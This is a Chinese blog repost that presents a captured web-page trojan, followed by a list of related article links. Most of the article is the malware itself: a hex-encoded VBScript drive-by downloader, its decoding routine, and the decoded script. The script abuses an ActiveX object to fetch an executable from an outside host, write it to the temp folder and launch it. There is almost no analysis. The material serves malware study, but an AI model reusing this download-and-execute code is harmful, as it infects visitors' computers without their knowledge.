获取的一个网页木马分析

最新推荐文章于 2024-05-30 15:30:51 发布
最新推荐文章于 2024-05-30 15:30:51 发布
阅读量179 收藏
点赞数
原文链接:https://yq.aliyun.com/articles/496873
版权

dm="006F006E0020006500720072006F007200200072006500730075006D00650020006E0065007800740D0A0D0A0064006C0020003D002000220068007400740070003A002F002F007700770077002E00620064006300720062002E0063006F006D002F00510051002F006800750061002E00650078006500220D0A0D0A0053006500740020006400660020003D00200064006F00630075006D0065006E0074002E0063007200650061007400650045006C0065006D0065006E007400280022006F0062006A006500630074002200290D0A0D0A00640066002E007300650074004100740074007200690062007500740065002000220063006C006100730073006900640022002C002000220063006C007300690064003A00420044003900360043003500350036002D0036003500410033002D0031003100440030002D0039003800330041002D00300030004300300034004600430032003900450033003600220D0A007300740072003D0022004D006900630072006F0073006F00660074002E0058004D004C004800540054005000220D0A0D0A005300650074002000780020003D002000640066002E004300720065006100740065004F0062006A0065006300740028007300740072002C0022002200290D0A0073007400720035003D002200410064006F00640062002E00530074007200650061006D00220D0A0D0A007300650074002000530020003D002000640066002E006300720065006100740065006F0062006A00650063007400280073007400720035002C0022002200290D0A0D0A0053002E00740079007000650020003D002000310D0A0073007400720036003D002200470045005400220D0A0078002E004F00700065006E00200073007400720036002C00200064006C002C002000460061006C007300650D0A0078002E00530065006E00640D0A0D0A0066006E0061006D00650031003D0022007A006A0031003200340034002E0063006F006D00220D0A0D0A007300650074002000460020003D002000640066002E006300720065006100740065006F0062006A006500630074002800220053006300720069007000740069006E0067002E00460069006C006500530079007300740065006D004F0062006A0065006300740022002C0022002200290D0A0D0A00730065007400200074006D00700020003D00200046002E004700650074005300700065006300690061006C0046006F006C0064006500720028003200290D0A0D0A0066006E0061006D00650031003D00200046002E004200750069006C0064005000610074006800280074006D0070002C0066006E0061006D0065003100290D0A0D0A0053002E006F00700065006E0D0A0053002E0077007200690074006500200078002E0072006500730070006F006E007300650042006F006400790D0A0D0A0053002E00730061007600650074006F00660069006C006500200066006E0061006D00650031002C00320D0A0D0A0053002E0063006C006F007300650A007300650074002000510020003D002000640066002E006300720065006100740065006F0062006A00650063007400280022005300680065006C006C002E004100700070006C00690063006100740069006F006E0022002C0022002200290D0A0D0A0051002E005300680065006C006C004500780065006300750074006500200066006E0061006D00650031002C00220022002C00220022002C0022006F00700065006E0022002C00300D0A"
execute(decode(dm))

Function decode(x)
For i = 1 To Len(x) Step 4
If Mid(x, i, 4) = "0D0A" Then
decode = decode & vbCrLf
Else
decode = decode & Chr(Int("&H" & Mid(x, i, 4)))
End If
Next
End Function

</script>
<script type="text/jscript">
function init() { 
document.write(Date());

}
window. = init; 
</script>

解密后的代码

on error resume next

dl = "[url]http://www.bdcrb.com/QQ/hua.exe[/url]"

Set df = document.createElement("object")

df.setAttribute "classid", "clsidD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"

Set x = df.CreateObject(str,"")
str5="Adodb.Stream"

set S = df.createobject(str5,"")

S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send

fname1="zj1244.com"

set F = df.createobject("Scripting.FileSystemObject","")

set tmp = F.GetSpecialFolder(2)

fname1= F.BuildPath(tmp,fname1)

S.open
S.write x.responseBody

S.savetofile fname1,2


 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/16474

weixin_34064653
关注
实验二木马分析(控制分析)实验和实验三冰河木马实验
qq_30600405的博客
10-31 1万+
木马分析(隐藏分析)实验 木马分析(控制分析)实验 木马植入方法实验---冰河木马
网页API分析之淘宝抢购秒杀原理(订单数据获取简单分析
热门推荐
qq269813279的博客
04-01 3万+
闲来无事,写这篇文章主要是希望淘宝方面能加强抢购软件的对抗。 据我了解秒杀类的商品基本都500ms内就被抢购空了,像那些正常的用户哪有机会。完全是黄牛党的福利。有没有~ 首先 我们来说一下抢购的几种花里胡哨的操作: 1、一种是通过模拟网页操作,这种方式能够通过一个循环的线程去获取时间,然后趋于0s内点击网页的下单,完成比人更快的操作,但是呢这种方式网页需要加载图片,执行JavaScr...
解析网页木马原理
xfyuanjun520的博客
06-25 727
首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运...
一句话网页木马汇总
05-26 514
 ASP一句话1. 2. 3. 免杀大部分网站的一句话4.免杀部分网站过略的一句话5.execute request("YouPass")免杀部分网站过略双引号的一句话6.php一句话 7.aspx一句话8. WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("
教你几招识别和防御Web网页木马
weixin_33730836的博客
11-09 559
本文同时发表在:[url]http://netsecurity.51cto.com/art/200709/56360.htm[/url] 根据反病毒厂商Sophos今年的第一、第二季度报告,网页已经超过电子邮件成为恶意软件传播时最喜欢使用的途径,通过网页传播的恶意软件平均每月增加300多种。而对用户来说,因为用户自己在互联网浏览时的安全...
专家全方位剖析网页木马
weixin_33802505的博客
11-03 891
一 、什么是网页木马   网页木马是利用网页来进行破坏的病毒,它包含在恶意网页之中,使用脚本语言编写恶意代码,依靠系统的漏洞,如IE浏览器存在的漏洞来实现病毒的传播。当用户登陆了包含网页病毒的恶意网站时,网页木马便被激活,受影响的系统一旦感染网页病毒,就会遭到破坏,轻则浏览器首页被修改,标题改变,系统自动弹出广告,重则被装上木马,感染病毒,使用户无法进行正常的使用。甚至会引起系统崩溃...
网站木马检测_检测病毒,用这几个网站就够了
weixin_39611937的博客
12-06 3430
平时我们上网的时候经常需要下载各种各样的文件,但文件下载多了,难免会遇到一些可疑软件,一旦这些软件包含病毒,电脑轻则多几个软件,重则破财。而你想让电脑上的杀毒软件为你单独检测某个文件的时候却又发现,无法让软件为你主动检测,只能等这些软件自己扫描,一旦将病毒扫描出来了还好,要是没有扫描出来,后果不堪设想。那么有什么办法可以主动检测下载的文件是否包含病毒呢?这次我就为各位推荐几个文件检测病毒的网站,希...
护卫神网页木马查杀软件
07-24
同时,"护卫神官方.url"是一个快捷方式,链接到护卫神官方网站,用户可以在这里获取最新版本的软件更新、技术支持和安全资讯。官方网站也是用户报告问题、寻求帮助或反馈意见的重要平台。 总的来说,"护卫神网页...
情人节程序员用HTML网页表白【3D旋转木马相册】 HTML5七夕情人节表白网页源码 HTML+CSS+JavaScript
08-10
通过以上分析可以看出,情人节表白网页的设计不仅仅是一个简单的项目,而是涵盖了HTML5、CSS3、JavaScript等多种技术的应用,不仅能够提高学生的动手能力和创造力,也能够为情侣们提供一种新颖而有意义的表达方式。
js一句话效果大全
11-10
非常牛逼的一句话代码,摘要的jq的精华,利用它的代码
详细渗透测试的网站内容分析
网站安全资讯
09-29 926
上一节讲到渗透测试中的代码审计讲解,对整个代码的函数分析以及危险语句的避让操作,近期很多客户找我们Sine安全想要了解如何获取到网站的具体信息,以及我们整个渗透工作的流程,因为这些操作都是通过实战累计下来的竟然,渗透测试是对网站检查安全性以及稳定性的一个预防针,前提是必须要有客户的授权才能做这...
制作网页木马
weixin_33676492的博客
11-09 240
大家对木马都不陌生了,它可能要算是计算机病毒史上最厉害的了,相信会使木马的人千千万万,但是有很多人苦于怎么把木马发给对方,现在随着计算机的普及,在网络上我相信很少有人会再轻易的接收对方的文件了,所以网页木马诞生了。1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了,可...
二行代码解决全部网页木马
php菜鸟技术天地
06-02 1440
还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。   前不久《http://bbs.blueidea.com/thread-2818052-1-1.html一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式
【WEB】远程电子数据取证-木马分析(第3题)
HAPPY
08-20 1079
【原题】 https://www.mozhe.cn/bug/detail/RHdoNU8zOUEreHdHeUhObGFPT0RGUT09bW96aGUmozhe  【解法1】 1.然后cd到这个目录(wwwroot)然后使用 dir /x 父目录 显示出dos下的文件名 2.用cmd  type发现其有888~1 选择运行   c:inetpubwwwroot888~1 3.  ...
网络安全人士必备的16个威胁情报分析网站
Python_paipai的博客
02-20 7997
SIC定位于企业本地化数字风险与威胁情报管理平台,致力于帮助用户实现多源情报接入、聚合、管理、共享与应用,并完成自身面临的钓鱼欺诈网站/APP/社媒等数字风险的落地与处置,帮助企业全面感知外部风险,建立私有情报视图,同时SIC可与天际友盟威胁情报网关TIG产品或用户自有安全产品进行衔接联动,为用户提供TI Feed和TI Lookup双模式情报应用能力,精细情报管理应用,提升威胁检测与处置效能,助力企业构建本地化的情报运营体系,打造智能安全运营。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
网页木马
言出必行
05-16 3572
当今网络,反病毒软件日益增多,使用的反病毒技术越来越先进,查杀病毒的能力逐渐提高,但病毒制作者并不会罢休,反查杀手段不断升级,新的病毒层出不穷,形式也越来越多样化,为了躲避查杀,病毒自身的隐蔽性越来越高,针对反病毒软件对传统的病毒传播途径的监控能力提高,造成病毒传播困难的问题,越来越多的病毒,利用多数反病毒软件产品对恶意脚本监控能力的缺陷,开始利用网页木马这一危害面最广泛,传播效果最佳的方式来传播
10个常用恶意软件检测分析平台(网工精选)
mengmeng_921的博客
01-10 3315
微步在线云沙箱基于多款反病毒引擎检测,快速检测已知威胁,利用虚拟化沙箱深度分析技术,实现恶意文件自动化、可定制化的行为分析,检测未知威胁,集成微步多个核心的高级情报分析系统。它可以结合多AV引擎检测、虚拟环境行为分析、威胁情报关联、自动化文件tag、启发式检测等技术,提供更精准的检测结果、可以满足多个场景下对恶意软件的检测、研判、分析需求。总的来说,Hybrid Analysis是一个功能强大的恶意软件分析平台,通过结合静态和动态分析技术,帮助用户识别和理解恶意软件的行为,从而加强安全防护和应对策略。
木马检测网站有哪些/木马检测网站是什么-新手漏洞知识点
最新发布
程序员六七的博客
05-30 384
美国网站服务器网络安全形势现在是越来越严峻,各种网络盗号、网站挂马、网站入侵等行为时有发生,面对这些情况的出现,美国网站服务器用户们就更加需要维护好网络安全
中国万维网网页木马威胁深度剖析与监测策略
随着地下经济产业链的推动,网络犯罪分子频繁利用网页木马网络对普通互联网用户进行攻击,目标是窃取他们的虚拟资产,以此获取非法收入。作者首先分析了这一现象的背景,从早期的发展历程到现代技术的应用,探讨了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值